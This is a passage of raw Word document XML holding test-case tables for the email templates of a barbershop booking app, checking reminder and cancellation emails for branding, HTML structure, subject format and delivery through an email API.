        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6B53C19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429 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0736AC0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0FC1B7B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="320DE9B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BRM-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5ACCFCC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050B626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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20CB9F2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3EA6684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B70ADE2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="32B6F86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BRM-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3065570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3AC84A7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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="30DD5D1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37484AF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A76E7CA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CCBB43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BRM-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DCE227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380CD95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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FFABB9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30FB79A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684F7D5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7EA70E5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BRM-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="69DE174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082F68B1"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1DD011B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3 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5245456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A1C678F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="762477A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BRM-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="701004C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3193694F"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F3BC5A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14 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="331A7C3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B0DB362" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4EBD8C0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BRM-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="58B2A3E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5847360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contains word “tomorrow”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EEF90B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078F99D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E6E07D0" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="47A78E1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BRM-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0203F4B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6CD08FF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includes shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18309F8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1C64B48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AEDCD3E" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3E2EAAE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BRM-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1F60235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4637660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greets client by name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="56526D6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333B746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3E7D98C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FE788F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BRM-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="507EEDA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306F41A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heading says “See You Tomorrow”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3735BF4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3F75E4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00C4292" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5091CC5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BRM-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="04580DF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411C0AE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displays service name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6BDB21C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50AB8B4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CEC73F4" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5162B1F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BRM-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5251D27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28038CC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displays shop address/location row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B3D541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6ACFB1F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7F4BA66" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="56293C4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BRM-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="06F9FAB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3F14C5B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Plain text contains </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>APPOINTMENT REMINDER</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1AF1683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3A37564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A3CFCB1" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029FE38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BRM-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE7767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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CB9CD8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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0F0B1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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>db89d3ba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F2930A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bl>
    <w:p w14:paraId="70B6F3B4"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reminder: Your appointment tomorrow at 2:30 PM — Crown Cuts Barbershop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B045B0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="391CA978">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E502C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="tc-bcn-booking-cancellation"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-BCN — Booking Cancellation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11067CA8"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Triggered when a booking’s status is patched to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cancelled</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bookings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="08F85B32"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="40E8F63F"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="443BB816"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4211FEBB"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="47662480"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="349310CD"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02D25364" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3ACF550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BCN-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EFD821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1E73E3E7"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5EFAD5F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57EEE4F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3B48AD9" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59D5C24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BCN-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="788AD1F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00A50B95"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56B9FE8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3158 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3865C7F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7B4995F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="303F6AF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BCN-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0BF67DA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0A3F9BA2"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4542442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362 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1A3D961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A5C729D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="766CAC3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BCN-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4218EBD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511B7F6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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26F2668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3C54556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5E00E1F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="17A594A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BCN-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4643A2A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2BC4BDE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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="35B65F2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306DF86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73C15C8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F8A684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BCN-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BCFE57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71A275A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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
